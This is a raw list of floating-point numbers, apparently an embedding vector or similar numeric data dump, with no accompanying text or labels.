0.005743224639445543, -0.023201484233140945, -0.022958610206842422, -0.010714970529079437, -0.00862912368029356, -0.012293643318116665, 0.02808750979602337, 0.016143890097737312, -0.026573127135634422, -0.01642962172627449, -0.003921679221093655, -0.02467300556600094, 0.010736401192843914, -0.007296895142644644, -0.005536068230867386, 0.02738746628165245, 0.01695822738111019, 0.01462236326187849, -0.03357357531785965, 0.015472417697310448, -0.0026715993881225586, -0.009900633245706558, 0.030144784599542618, -0.006979017518460751, -0.022958610206842422, 0.0289304219186306, 0.024130115285515785, 0.0186011902987957, -0.06063244864344597, 0.008679126389324665, 0.01932980678975582, 0.01890120841562748, -0.0008098732214421034, 0.029087575152516365, -0.02747318521142006, 0.007864789105951786, 0.0030216218437999487, 0.004868168383836746, -0.003164488123729825, 0.018215451389551163, -0.0037716696970164776, 0.022458579391241074, -0.02430155500769615, -0.008057658560574055, -0.02687314711511135, -0.005368200596421957, 0.040545448660850525, -0.04380280151963234, -0.04868882894515991, -0.027944644913077354, 0.004457428120076656, -0.03163059428334236, -0.02591594308614731, -0.013315137475728989, -0.03554512932896614, -0.0039466810412704945, -0.007564769592136145, 0.0015777794178575277, -0.030344797298312187, 0.013522293418645859, 0.04217412695288658, -0.01952981948852539, -0.007293323520570993, 0.04348849505186081, -0.053260549902915955, 0.020515598356723785, -0.005953952204436064, -0.004221698734909296, 0.007750495802611113, -0.046545833349227905, 0.0009170229313895106, -0.03480222448706627, -0.00790764857083559, 0.0015259904321283102, 0.030944835394620895, 0.005018177907913923, 0.0047110156156122684, 0.010229225270450115, 0.01838688924908638, -0.01695822738111019, -0.006746860221028328, 0.0010313160018995404, 0.013222274370491505, -0.006089675240218639, 0.007457619998604059, 0.006503987591713667, 0.0009464891045354307, 0.03731667250394821, -0.01192933414131403, 0.021844254806637764, 0.01492952648550272, -0.015100965276360512, -0.0103220883756876, -0.015186685137450695, -0.004214555025100708, -0.00831481721252203, 0.009529180824756622, -0.042088404297828674, -0.00024443527217954397, 0.02294432371854782, 0.004614580888301134, 0.03005906566977501, 0.01674392819404602, 0.0018170805415138602, -0.015572424046695232, -0.018472610041499138, -0.00699687609449029, 0.02591594308614731, -0.06457556039094925, 0.024001535028219223, -0.024001535028219223, 0.021858541294932365, 0.012550802901387215, 0.015258118510246277, -0.03148772940039635, -0.004100262187421322, -0.018872635439038277, 0.03017335757613182, 0.044688571244478226, -0.04108834266662598, 0.016272468492388725, 0.02241571992635727, -0.023387210443615913, 0.06931871920824051, -0.04108834266662598, -0.032716378569602966, -0.02108706347644329, 0.059546664357185364, -0.04877454787492752, -0.0578608438372612, -0.019672686234116554, 0.027844637632369995, -0.016086742281913757, -0.016758214682340622, 0.016072455793619156, -0.04265987128019333, 0.02925901487469673, 0.0007371007231995463, -0.006800435017794371, -0.00857197679579258, -0.014758086763322353, 0.028644688427448273, 0.031030556187033653, -0.005918235518038273, 0.04434569180011749, 0.03183060884475708, 0.03780241683125496, -0.018744055181741714, 0.002993048634380102, -0.0032948534935712814, 0.01828688383102417, 0.005303910467773676, -0.005028893239796162, 0.0016322472365573049, -0.06434696912765503, 0.018129730597138405, -0.01571528986096382, 0.01044352538883686, 0.01373659260571003, 0.012943685054779053, 0.024444419890642166, 0.027044586837291718, -0.017743991687893867, 0.008857709355652332, 0.041802674531936646, -0.04331705719232559, 0.003568085376173258, -0.018858348950743675, 0.0012974044075235724, 0.008871995843946934, -0.008300530724227428, -0.025501631200313568, -0.008300530724227428, -0.04451713338494301, -0.011029276996850967, -0.005789656192064285, -0.028030363842844963, 0.04431711882352829, -0.014858093112707138, 0.015100965276360512, 0.013472289778292179, -0.05591786280274391, -0.031573448330163956, -0.03037337027490139, 0.01820116490125656, -0.01592959091067314, 0.004303846508264542, 0.029601892456412315, 0.012207923457026482, -0.0067254300229251385, -0.012536516413092613, 0.0018697624327614903, -0.0206584632396698, -0.004225270356982946, 0.03245921805500984, -0.001418840722180903, 0.004939601756632328, 0.032802097499370575, 0.00003928822843590751, -0.006175395101308823, 0.015558137558400631, 0.02798750437796116, 0.004368136636912823, -0.008421966806054115, 0.0002442120457999408, -0.005100326146930456, 0.021329935640096664, -0.0042931316420435905, 0.0340593196451664, 0.011950763873755932, 0.011036420240998268, 0.03637375310063362, -0.008429110050201416, 0.008400537073612213, -0.010200652293860912, -0.029716186225414276, 0.0021144209895282984, -0.021729961037635803, -0.015786724165081978, 0.013343710452318192, -0.008543403819203377, -0.00475030392408371, 0.0006875439430586994, -0.014743800275027752, -0.008950572460889816, 0.00002249027784273494, 0.026630274951457977, 0.04308846965432167, -0.01868690922856331, -0.017115380614995956, 0.009986353106796741, 0.00009939252049662173, -0.015729578211903572, -0.01218649372458458, 0.03108770214021206, 0.02075847052037716, -0.0001439824263798073, -0.02718745358288288, 0.015200972557067871, -0.010822121053934097, 0.015486705116927624, -0.023815808817744255, -0.04300275072455406, 0.02178710699081421, -0.017786851152777672, -0.01910122111439705, -0.004846738651394844, -0.02925901487469673, -0.003453792305663228, -0.03794528543949127, 0.0030091209337115288, -0.021644242107868195, 0.009029149077832699, -0.003925250843167305, 0.045945797115564346, 0.002687671920284629, -0.021158495917916298, -0.010357805527746677, 0.011829327791929245, 0.02985905297100544, -0.007486192975193262, 0.040545448660850525, 0.004546719137579203, -0.0024394416250288486, 0.014022325165569782, -0.008550547063350677, 0.008557690307497978, -0.018672622740268707, 0.015500991605222225, 0.022915750741958618, -0.010629251599311829, 0.005971810314804316, -0.012672238983213902, 0.019358381628990173, -0.009464890696108341, -0.016915367916226387, -0.010843550786376, 0.050888970494270325, -0.021015629172325134, 0.02737317979335785, -0.034459345042705536, 0.052031900733709335, -0.0060075270012021065, 0.013815169222652912, -0.010400664992630482, 0.006575420498847961, 0.0206727497279644, -0.012257927097380161, 0.009486321359872818, 0.005125327967107296, 0.003718094900250435, 0.005028893239796162, -0.016915367916226387, 0.03357357531785965, 0.023001471534371376, 0.03783098980784416, 0.011679318733513355, 0.0040395441465079784, 0.008536260575056076, -0.005436061881482601, -0.00023215770488604903, 0.006929014343768358, 0.010722114704549313, 0.021215641871094704, -0.01971554569900036, -0.005846802610903978, 0.013550866395235062, 0.00035694247344508767, 0.011086422950029373, -0.019058361649513245, -0.008650553412735462, -0.0010777474381029606, -0.02491587959229946, -0.007400473114103079, -0.019886985421180725, -0.012929398566484451, -0.005618216469883919, -0.02303004451096058, -0.013693733140826225, 0.012165063992142677, 0.001743861474096775, -0.021001342684030533, 0.003996684215962887, -0.0030412659980356693, -0.018129730597138405, -0.019772693514823914, -0.01528669148683548, 0.0064004091545939445, 0.0000134146412165137, -0.008686269633471966, 0.003010906744748354, -0.02457300014793873, 0.00025537348119542, -0.004871740005910397, -0.006525417324155569, -0.012829392217099667, -0.005932522471994162, 0.025787362828850746, -0.009729193523526192, -0.02501588501036167, -0.01694394089281559, 0.011215003207325935, 0.0077790687792003155, -0.020929910242557526, -0.03428790718317032, 0.04454570636153221, -0.007036164402961731, 0.027744632214307785, 0.0754333958029747, 0.0069218710996210575, 0.029773332178592682, -0.002425155136734247, 0.03603087738156319, 0.003337713424116373, 0.002259073080495, 0.0206727497279644, 0.03525939956307411, -0.06217540428042412, 0.017843998968601227, -0.03665948659181595, 0.024101540446281433, 0.022372858598828316, -0.00293054454959929, -0.021429941058158875, -0.007096882443875074, -0.021358508616685867, -0.03245921805500984, 0.03811672329902649, -0.006661140359938145, -0.04731731116771698, -0.03397360071539879, 0.014043754898011684, 0.03691664710640907, -0.006804006639868021, -0.02665884792804718, -0.0023733661510050297, 0.007814785465598106, -0.004300274886190891, -0.04100262373685837, 0.025673070922493935, -0.019915560260415077, 0.015586711466312408, 0.01830117031931877, 0.008264814503490925, 0.010622107423841953, 0.016986800357699394, -0.03163059428334236, -0.032602086663246155, 0.002028701128438115, 0.01600102335214615, 0.03954538702964783, -0.0001610594044905156, 0.06268972158432007, 0.041802674531936646, 0.0076004862785339355, -0.017086807638406754, 0.008550547063350677, -0.049746040254831314, -0.020944196730852127, -0.017301106825470924, 0.006839723326265812, -0.013715162873268127, -0.03505938500165939, -0.020844189450144768, -0.015886729583144188, 0.010464955121278763, 0.0014750943519175053, -0.030916262418031693, 0.0253301914781332, 0.01111499685794115, -0.00965776015073061, -0.013565152883529663, 0.017072521150112152, -0.006857581436634064, -0.030944835394620895, -0.01900121569633484, -0.015100965276360512, -0.009229161776602268, 0.00475030392408371, 0.003243064507842064, -0.01080069039016962, 0.01767255924642086, 0.011164999566972256, -0.00293054454959929, -0.03360214829444885, -0.035573702305555344, 0.0014134832890704274, -0.012465083040297031, 0.020701324567198753, 0.0547463595867157, 0.009493464604020119, -0.031773459166288376, 0.029101861640810966, -0.011565024964511395, -0.03080197051167488, -0.012872251681983471, -0.023515788838267326, 0.0026162387803196907, 0.008950572460889816, -0.014572360552847385, 0.005321769043803215, 0.025058744475245476, -0.010029212571680546, -0.01765827275812626, 0.01964411325752735, -0.0072004604153335094, -0.006571848876774311, -0.006914727855473757, -0.023930102586746216, -0.0024519425351172686, -0.003187703900039196, -0.01260794885456562, 0.008564833551645279, -0.001401875400915742, 0.0010393521515652537, 0.010872123762965202, -0.02873040921986103, -0.015872443094849586, -0.004439569544047117, -0.031173422932624817, 0.020187005400657654, 0.010300658643245697, 0.024144401773810387, 0.004303846508264542, 0.0069683026522397995, 0.00796479545533657, -0.0186154767870903, -0.025687357410788536, 0.03763097897171974, 0.006989732850342989, -0.028687549754977226, -0.014186621643602848, 0.014886666089296341, -0.02231571264564991, 0.004996748175472021, 0.022587159648537636, -0.0023947961162775755, -0.014829520136117935, 0.011657888069748878, -0.016358189284801483, -0.023730089887976646, -0.011800754815340042, -0.0028341098222881556, 0.0018590474501252174, -0.01652962900698185, 0.027501758188009262, 0.015572424046695232, 0.0126650957390666, 0.02025843784213066, -0.041802674531936646, -0.04185982048511505, -0.009000575169920921, 0.01891549490392208, -0.013865172863006592, -0.01632961630821228, -0.012479369528591633, -0.012086487375199795, 0.005078896414488554, -0.006636138539761305, 0.0011259649181738496, 0.006425410974770784, 0.0015331337926909328, -0.004225270356982946, -0.015743864700198174, 0.013565152883529663, -0.0022733595687896013, 0.029059000313282013, -0.01534383837133646, -0.025587350130081177, 0.0016188535373657942, 0.02645883522927761, -0.020587030798196793, 0.016872508451342583, 0.01492952648550272, 0.0057646543718874454, 0.010022069327533245, -0.04174552857875824, 0.0006942408508621156, -0.042202699929475784, -0.004278845153748989, 0.01725824736058712, -0.029059000313282013, 0.017186813056468964, -0.0032144912984222174, 0.01219363696873188, 0.0021233500447124243, 0.0020090569742023945, -0.008336246944963932, 0.03674520552158356, -0.017701132223010063, -0.00431456184014678, -0.016601061448454857, 0.007046879269182682, 0.030116211622953415, -0.0017983292927965522, -0.02417297475039959, 0.011622171849012375, 0.012529372237622738, -0.022887177765369415, -0.027330318465828896, 0.00857912003993988, 0.0010947128757834435, -0.03088768944144249, -0.0012447225162759423, -0.04120263457298279, 0.015372411347925663, -0.01765827275812626, -0.006357549224048853, 0.020515598356723785, -0.005818229168653488, 0.017429685220122337, 0.00006373175710905343, 0.02573021687567234, -0.031573448330163956, -0.01900121569633484, 0.03183060884475708, -0.0121364900842309, -0.0278874970972538, 0.0015134896384552121, -0.04834594950079918, 0.022087126970291138, -0.020472737029194832, 0.009422031231224537, 0.01652962900698185, 0.037659551948308945, -0.0066325669176876545, -0.0019608396105468273, 0.02364436909556389, -0.013765165582299232, -0.001361694186925888, -0.02148708887398243, 0.02747318521142006, -0.0076862056739628315, -0.010043499059975147, -0.02088705077767372, 0.0372023805975914, -0.02253001183271408, -0.02913043461740017, -0.015958163887262344, -0.025958802551031113, -0.028658974915742874, -0.019344095140695572, -0.02025843784213066, -0.015158112160861492, -0.013307994231581688, 0.0013286564499139786, 0.016572488471865654, 0.017415398731827736, 0.0038002431392669678, 0.02158709429204464, -0.016515342518687248, 0.006307546049356461, -0.011907904408872128, -0.010979273356497288, 0.02232999913394451, -0.003235921263694763, 0.03680235520005226, 0.00519318925216794, -0.01147216185927391, 0.006618280429393053, -0.0050110346637666225, 0.006289687938988209, -0.026801714673638344, -0.031973473727703094, -0.010100645944476128, 0.01357944030314684, -0.0024823015555739403, -0.006336119491606951, -0.0009982781484723091, 0.026315968483686447, -0.019915560260415077, -0.006396837532520294, -0.018001150339841843, -0.020501311868429184, 0.005600358359515667, 0.0005169973592273891, -0.014493783935904503, 0.02127278968691826, 0.0009121118928305805, 0.009443460963666439, 0.007714779116213322, -0.054089173674583435, 0.0003323873388580978, -0.024401560425758362, -0.019172655418515205, 0.004682442173361778, 0.004782448522746563, -0.001832260051742196, -0.055832140147686005, -0.011207859963178635, 0.06343262642621994, 0.05234620347619057, 0.018315456807613373, -0.037145230919122696, -0.00997206661850214, -0.022129986435174942, -0.005021749529987574, -0.0011009632144123316, 0.005493208300322294, -0.008136234246194363, -0.017615411430597305, 0.01172217819839716, 0.029516173526644707, 0.016458194702863693, -0.006871867924928665, 0.037345245480537415, 0.016358189284801483, 0.009072008542716503, -0.012793675065040588, -0.044888585805892944, -0.021944260224699974, 0.007196888793259859, -0.028287522494792938, 0.01820116490125656, 0.004343134816735983, 0.052746228873729706, -0.014786659739911556, -0.009936349466443062, 0.0031680597458034754, 0.008900568820536137, -0.004407424945384264, -0.011807898059487343, -0.025573063641786575, 0.0056360745802521706, -0.024744439870119095, 0.0351165309548378, -0.00022200080275069922, -0.03223063424229622, -0.02405868098139763, 0.021029915660619736, 0.0403168648481369, 0.015158112160861492, -0.01374373584985733, 0.0027948215138167143, -0.010250655934214592, -0.04060259833931923, 0.001587601494975388, 0.01662963442504406, -0.001199183869175613, -0.010250655934214592, -0.005646789912134409, 0.016601061448454857, -0.00019677597447298467, -0.018458323553204536, -0.022058553993701935, -0.022687165066599846, -0.01332942396402359, -0.00795765221118927, -0.0016777858836576343, -0.018858348950743675, -0.01610102877020836, 0.026730280369520187, -0.014093758538365364, -0.01225078385323286, -0.003803814761340618, 0.007371900137513876, 0.014186621643602848, 0.03565942496061325, -0.008414823561906815, -0.019772693514823914, 0.029173294082283974, 0.009264877997338772, -0.016972513869404793, 0.010750687681138515, -0.010029212571680546, -0.02635882794857025, 0.008929142728447914, -0.023530075326561928, 0.012379363179206848, 0.04460285231471062, 0.012765102088451385, 0.03948824107646942, -0.001083104987628758, -0.02540162391960621, -0.016772501170635223, -0.006411124486476183, -0.0045252894051373005, -0.018758341670036316, 0.03791670873761177, -0.01487237960100174, -0.0006295045604929328, -0.023058617487549782, -0.000020899773517157882, 0.019786980003118515, -0.005989668890833855, -0.010686397552490234, -0.0011831113370135427, 0.005796799436211586, -0.013558009639382362, -0.02747318521142006, 0.026530267670750618, -0.014579503796994686, 0.013029404915869236, -0.03894534707069397, -0.009529180824756622, -0.037859562784433365, -0.056975070387125015, -0.006457556039094925, 0.003718094900250435, -0.009229161776602268, -0.014086615294218063, 0.003568085376173258, 0.017129667103290558, 0.016201036050915718, -0.016272468492388725, -0.000024624900106573477, -0.031887754797935486, -0.010372092016041279, 0.010250655934214592, 0.0008049621828831732, -0.011865044943988323, -0.022072840481996536, -0.022187132388353348, 0.016143890097737312, 0.012965114787220955, 0.04011685028672218, -0.04040258377790451, 0.003660948481410742, 0.004811021964997053, 0.0014956314116716385, 0.0019733405206352472, 0.021415654569864273, 0.007707635872066021, -0.00163403304759413, 0.019858412444591522, 0.01848689652979374, 0.012472226284444332, 0.00991491973400116, -0.0021483516320586205, 0.017543978989124298, 0.008793419227004051, -0.012350790202617645, 0.017901144921779633, -0.02137279510498047, -0.005364628974348307, 0.01870119571685791, 0.03211633861064911, 0.01172932144254446, -0.03957396000623703, -0.020515598356723785, -0.01571528986096382, 0.012493656016886234, 0.014108045026659966, 0.003534154500812292, 0.0058682323433458805, -0.008236240595579147, 0.014115188270807266, -0.006207539699971676, 0.05208904668688774, -0.013357996940612793, 0.000628165144007653, 0.0103363748639822, -0.000056532633607275784, -0.00033060149871744215, 0.027116019278764725, -0.02728745900094509, -0.024615859612822533, -0.03068767674267292, 0.02324434369802475, -0.03385930880904198, -0.01528669148683548, -0.01974412053823471, 0.0028948280960321426, 0.005443205125629902, -0.012772245332598686, 0.009350597858428955, 0.0026126671582460403, 0.002221570583060384, -0.01817259006202221, -0.020372731611132622, 0.019158368930220604, -0.01768684573471546, 0.010807833634316921, -0.005528924986720085, 0.0027626766823232174, -0.018629763275384903, -0.013665159232914448, -0.019258374348282814, -0.0035877295304089785, 0.021687101572752, -0.058746613562107086, -0.011565024964511395, -0.0021251358557492495, -0.030516237020492554, 0.015486705116927624, 0.005482493434101343, -0.018786916509270668, -0.01820116490125656, 0.013093694113194942, -0.02158709429204464, -0.01974412053823471, 0.0006536132423207164, 0.024344414472579956, 0.07017591595649719, 0.03005906566977501, -0.020101284608244896, -0.01219363696873188, 0.004332419950515032, -0.020229864865541458, 0.01931552030146122, 0.007543339394032955, -0.000017621105143916793, -0.001275081536732614, 0.013136554509401321, 0.005232477560639381, 0.01602959632873535, 0.010672111064195633, -0.010293515399098396, -0.007529052905738354, -0.016043882817029953, -0.009900633245706558, 0.01512953918427229, -0.009164871647953987, -0.00106435373891145, 0.007182602304965258, 0.01151502225548029, -0.027758918702602386, 0.0005111934151500463, -0.003921679221093655, -0.004457428120076656, -0.03834531083703041, -0.01682964712381363, -0.006568277254700661, -0.002675171010196209, 0.005328912287950516, -0.008229097351431847, 0.0007085274555720389, 0.02654455415904522, 0.0009643473895266652, 0.011836471036076546, -0.005489636678248644, 0.004425283055752516, -0.005311053711920977, -0.006214682944118977, -0.00810766126960516, -0.010707827284932137, -0.0018572616390883923, 0.01151502225548029, -0.01631532981991768, 0.042517006397247314, 0.023501502349972725, -0.024015821516513824, 0.0008478220552206039, -0.011029276996850967, -0.006268258206546307, 0.019686972722411156, 0.02397296205163002, -0.00043105435906909406, 0.004693157505244017, -0.02105848863720894, -0.013307994231581688, -0.013893745839595795, -0.003093054983764887, -0.009993496350944042, 0.008471970446407795, -0.004110977053642273, 0.03140200674533844, 0.02085847593843937, -0.0180868711322546, -0.013165127485990524, 0.005061037838459015, 0.007836215198040009, 0.04111691564321518, 0.008043371140956879, 0.0032537796068936586, -0.007429046556353569, 0.0018001151038333774, 0.014372347854077816, 0.03360214829444885, -0.012736529111862183, 0.007450476288795471, -0.028658974915742874, -0.026887433603405952, 0.015872443094849586, 0.005471778567880392, 0.008536260575056076, 0.03077339567244053, -0.02625882253050804, 0.04171695187687874, -0.0076004862785339355, 0.002167995786294341, -0.00673971651121974, -0.005003891419619322, -0.02034415863454342, -0.0003239046491216868, 0.016301043331623077, 0.023215770721435547, 0.000637540768366307, 0.011757894419133663, 0.005286052357405424, -0.00743618980050087, -0.010686397552490234, -0.010543531738221645, 0.025544490665197372, 0.000956311181653291, 0.006118248216807842, 0.0021715674083679914, -0.011357869021594524, 0.009786340408027172, -0.002884112996980548, 0.014243767596781254, 0.010964986868202686, -0.011543595232069492, -0.04811736196279526, -0.04154551401734352, 0.006039672065526247, -0.030401945114135742, -0.015586711466312408, -0.0006857581320218742, 0.00676828995347023, 0.025387337431311607, -0.011365012265741825, -0.01840117760002613, -0.016672493889927864, 0.0005451241740956903, 0.013686589896678925, -0.0039466810412704945, 0.009014862589538097, 0.0025055173318833113, 0.0021929973736405373, -0.004435997921973467, 0.03174488618969917, 0.025344477966427803, 0.01911550760269165, 0.010550674982368946, 0.0009045221377164125, -0.022772883996367455, 0.03585943579673767, -0.05206047371029854, 0.02798750437796116, 0.013972322456538677, 0.021315649151802063, 0.0063325478695333, -0.010114932432770729, 0.032716378569602966, 0.027216026559472084, 0.02375866286456585, 0.02014414593577385, 0.009143441915512085, 0.028044650331139565, 0.0066325669176876545, 0.004460999742150307, 0.010479241609573364, 0.005325340665876865, -0.015672430396080017, 0.0072361771017313, 0.04474571719765663, 0.011415015906095505, 0.0024394416250288486, 0.01332942396402359, -0.031059129163622856, -0.009564897045493126, 0.02087276428937912, 0.0014670580858364701, 0.03345928341150284, 0.018629763275384903, -0.021672815084457397, -0.008021941408514977, 0.03183060884475708, -0.004425283055752516, -0.02263001911342144, -0.031973473727703094, -0.02127278968691826, 0.007557626347988844, 0.014986672438681126, -0.008329103700816631, 0.020529884845018387, 0.02034415863454342, 0.006475414149463177, -0.0024376558139920235, -0.010614964179694653, 0.0320306196808815, -0.004114548675715923, 0.000724153476767242, 0.03503081202507019, -0.0019554821774363518, -0.0017179669812321663, 0.028187517076730728, -0.016286754980683327, -0.005443205125629902, 0.024558713659644127, -0.029373306781053543, 0.022915750741958618, 0.012229353189468384, 0.022572871297597885, -0.03068767674267292, -0.011386441998183727, -0.011486449278891087, -0.013929462060332298, -0.008186237886548042, -0.020215578377246857, -0.0008522866410203278, 0.01901550218462944, 0.007286180276423693, -0.0019965562969446182, -0.014229481108486652, 0.017858285456895828, -0.0016652850899845362, -0.03234492614865303, -0.0018340458627790213, 0.023215770721435547, -0.014565217308700085, 0.007607629522681236, -0.014493783935904503, 0.029116148129105568, 0.027773205190896988, 0.000967026106081903, 0.010857837274670601, 0.008757703006267548, 0.020601317286491394, -0.0211727824062109, -0.01017922256141901, 0.02263001911342144, -0.01724395900964737, 0.030659103766083717, 0.005689649377018213, 0.011529308743774891, -0.01260794885456562, 0.002759105060249567, 0.03491652011871338, -0.025887370109558105, -0.002571593038737774, -0.008650553412735462, -0.0023733661510050297, -0.006168251391500235, 0.015072392299771309, -0.010414951480925083, -0.013922318816184998, -0.0070147342048585415, -0.007096882443875074, -0.004968174733221531, -0.002318005310371518, -0.02985905297100544, 0.003814529627561569, 0.007650489453226328, -0.018786916509270668, -0.0012098988518118858, -0.024458706378936768, -0.00023617582337465137, -0.01922980137169361, 0.014422350563108921, -0.009122012183070183, 0.025044457986950874, -0.011286435648798943, -0.005589643027633429, 0.0004368583031464368, 0.00863626692444086, -0.015758151188492775, 0.03885962814092636, 0.02757319249212742, 0.001042923890054226, 0.016558201983571053, 0.0018447608454152942, -0.007057594135403633, -0.0023358636535704136, -0.0063539776019752026, 0.00930773839354515, -0.004110977053642273, 0.03948824107646942, -0.002875183941796422, 0.005739652551710606, 0.017215386033058167, 0.006075388751924038, 0.020287010818719864, 0.0032305638305842876, 0.004407424945384264, 0.002401939360424876, -0.008929142728447914, 0.008821993134915829, 0.0028233949560672045, -0.02085847593843937, -0.0016161748208105564, 0.0048610251396894455, -0.028030363842844963, 0.034459345042705536, 0.009107725694775581, -0.026787428185343742, 0.008529117330908775, -0.004686013795435429, -0.028244663029909134, 0.010186365805566311, 0.008529117330908775, -0.015429558232426643, 0.004325276706367731, 0.01818687655031681, -0.02357293665409088, -0.02334434911608696, 0.014786659739911556, 0.002966261235997081, -0.026101669296622276, 0.0330878309905529, -0.023815808817744255, 0.006843294948339462, 0.026201674714684486, -0.0018519040895625949, 0.02974475920200348, 0.016672493889927864, -0.013222274370491505, 0.022372858598828316, -0.0012063271133229136, -0.008493400178849697, 0.01380088273435831, 0.0029341161716729403, 0.008029084652662277, -0.029059000313282013, 0.0029573319479823112, -0.022815745323896408, 0.007621916010975838, 0.0040395441465079784, 0.00007076345355017111, -0.002846610499545932, -0.008086231537163258, -0.006496843881905079, 0.010779260657727718, -0.002012628596276045, -0.017901144921779633, -0.045717209577560425, -0.010672111064195633, 0.011450732126832008, 0.0018126158975064754, -0.011793611571192741, -0.0034609355498105288, -0.02997334487736225, 0.02521589770913124, 0.022472865879535675, 0.02488730661571026, 0.0043395631946623325, 0.014900952577590942, -0.01280796155333519, 0.0015768865123391151, 0.006964731030166149, 0.005021749529987574, -0.011193572543561459, -0.020829902961850166, 0.026415975764393806, -0.018315456807613373, 0.0058682323433458805, 0.025987375527620316, 0.035888008773326874, 0.0047574471682310104, 0.005239620804786682, -0.0033537859562784433, -0.014658080413937569, -0.032287780195474625, 0.000943810329772532, 0.004435997921973467, 0.010507814586162567, -0.002142994198948145, 0.015529564581811428, 0.01292225532233715, 0.006711143534630537, 0.007607629522681236, -0.029573319479823112, -0.012850821949541569, 0.020101284608244896, -0.011222146451473236, -0.005789656192064285, 0.0005674469866789877, 0.021929973736405373, -0.00743618980050087, 0.007586199324578047, 0.000039818394725443795, -0.03597372770309448, -0.015515278093516827, 0.0042359852232038975, -0.014122331514954567, -0.003989540971815586, -0.0071647437289357185, 0.024644432589411736, 0.03645947575569153, -0.01581529714167118, -0.023472929373383522, 0.035888008773326874, 0.0010339947184547782, 0.004682442173361778, 0.011793611571192741, -0.008850566111505032, -0.026844574138522148, 0.007629059255123138, -0.013550866395235062, 0.007043307647109032, -0.00832196045666933, -0.017086807638406754, 0.005771797616034746, 0.00472530210390687, -0.003671663347631693, 0.033430710434913635, 0.00004425506267580204, 0.007414760068058968, 0.016386762261390686, 0.0005411060410551727, -0.03448791801929474, 0.0028894704300910234, 0.023315776139497757, 0.0075004794634878635, -0.00498603330925107, 0.013929462060332298, -0.0016384976916015148, 0.008879139088094234, 0.0038752479013055563, -0.03325926885008812, 0.03268780559301376, -0.00431456184014678, 0.01611531712114811, 0.0014983101282268763, 0.021644242107868195, -0.013193700462579727, -0.012829392217099667, -0.003918107599020004, 0.006257542874664068, 0.0020769184920936823, 0.00857912003993988, 0.015558137558400631, 0.003593086963519454, 0.01058639120310545, -0.03077339567244053, -0.027087446302175522, 0.017829712480306625, -0.012950828298926353, 0.009093438275158405, -0.006600422319024801, 0.0017617198172956705, 0.0006522738840430975, 0.019272660836577415, 0.03028765134513378, 0.012893681414425373, 0.01592959091067314, 0.001564385718666017, -0.00005770458301412873, -0.007721922360360622, -0.020829902961850166, 0.012543659657239914, -0.01099355984479189, 0.012165063992142677, -0.0026555268559604883, -0.01347943302243948, 0.015615284442901611, 0.012243639677762985, -0.004103833809494972, -0.009793483652174473, -0.007786212023347616, -0.005171759519726038, 0.004221698734909296, 0.01735825277864933, 0.0206584632396698, -0.0037216665223240852, 0.015872443094849586, 0.006232541520148516, -0.01426519826054573, 0.006364692933857441, -0.0074433330446481705, -0.01951553300023079, -0.0015483133029192686, 0.00586108909919858, -0.015615284442901611, 0.0063432627357542515, 0.002571593038737774, 0.01130786631256342, 0.02334434911608696, 0.010057786479592323, 0.0028644688427448273, 0.002259073080495, -0.014015181921422482, 0.028658974915742874, -0.003939537797123194, 0.0014045541174709797, 0.00898628868162632, 0.0021876399405300617, 0.0047110156156122684, -0.021972833201289177, -0.01910122111439705, -0.0065289889462292194, -0.013979465700685978, 0.0021019200794398785, -0.009114868938922882, -0.012672238983213902, -0.009764909744262695, -0.0023715803399682045, 0.008029084652662277, 0.013465146534144878, 0.017086807638406754, 0.0042574149556458, 0.008007654920220375, -0.010157792828977108, -0.00428956001996994, -0.015529564581811428, 0.008193381130695343, 0.01233650278300047, 0.010407808236777782, 0.006457556039094925, 0.023801522329449654, 0.02718745358288288, -0.008229097351431847, -0.009929206222295761, -0.011479305103421211, 0.012879394926130772, -0.011693605221807957, 0.01727253384888172, 0.0007754960097372532, -0.02004413865506649, 0.012636522762477398, -0.001627782708965242, -0.022658592090010643, 0.01111499685794115, -0.009157728403806686, -0.020401304587721825, 0.003882391145452857, 0.000031670551834395155, -0.008600549772381783, -0.010064929723739624, 0.012629379518330097, -0.029887625947594643, 0.0017304677749052644, 0.00408597569912672, 0.011557881720364094, -0.007050450891256332, -0.01930123381316662, 0.007507623173296452, 0.02088705077767372, 0.007529052905738354, 0.0063896942883729935, -0.0003460042644292116, -0.017315393313765526, -0.002618024591356516, -0.0006103068590164185, -0.008379107341170311, -0.012843678705394268, -0.010729257948696613, 0.0009089867235161364, 0.03151630237698555, -0.02603023685514927, 0.0016581417294219136, -0.006411124486476183, 0.01788685843348503, -0.008464827202260494, 0.00023662227613385767, 0.020072711631655693, 0.001315262634307146, -0.03160202130675316, -0.012200780212879181, -0.024358700960874557, -0.018729768693447113, 0.015643857419490814, -0.00785764493048191, -0.00018516808631829917, -0.0014179478166624904, -0.026315968483686447, 0.00539677357301116, 0.010164936073124409, -0.002434084191918373, -0.005900377407670021, -0.017629699781537056, 0.018958354368805885, 0.011629315093159676, -0.007275465410202742, 0.022158559411764145, 0.030401945114135742, -0.0004888705443590879, 0.01540098525583744, 0.0012554373824968934, 0.011600742116570473, -0.001450092764571309, -0.039402518421411514, 0.006614708807319403, 0.008214810863137245, -0.0009589898982085288, 0.017286820337176323, -0.0071183121763169765, -0.0006116462755016983, -0.004671727307140827, -0.008457683958113194, 0.021415654569864273, -0.012829392217099667, 0.011857900768518448, 0.011607885360717773, -0.020329872146248817, -0.013422287069261074, 0.012693668715655804, -0.02450156770646572, 0.015372411347925663, -0.0258445106446743, -0.022401433438062668, 0.005503923632204533, 0.005307482089847326, 0.024030108004808426, -0.013379426673054695, -0.002269787946715951, -0.017701132223010063, -0.007036164402961731, -0.023415783420205116, -0.00036475545493885875, 0.008257671259343624, 0.004632438998669386, -0.00008315264130942523, -0.003025193465873599, -0.02002985216677189, -0.010364948771893978, -0.019158368930220604, 0.0071075973100960255, 0.02035844512283802, -0.0018215450691059232, -0.03268780559301376, -0.016872508451342583, 0.01971554569900036, -0.02243000641465187, 0.004950316622853279, -0.0026126671582460403, -0.01995841972529888, -4.8831246601821476e-8, 0.002628739457577467, -0.0008969323826022446, -0.010100645944476128, -0.022915750741958618, 0.019258374348282814, 0.01080069039016962, -0.004121692385524511, -0.004857453517615795, 0.00930773839354515, -0.0006071816897019744, 0.006039672065526247, -0.014700939878821373, -0.0006085210479795933, -0.003594872774556279, 0.018786916509270668, 0.028287522494792938, 0.013986608944833279, 0.02002985216677189, 0.0004692264483310282, 0.019058361649513245, -0.003975254017859697, -0.011300723068416119, 0.005786084104329348, -0.008643410168588161, 0.00498603330925107, -0.0013599083758890629, 0.005364628974348307, 0.014800946228206158, 0.001663499278947711, -0.008879139088094234, 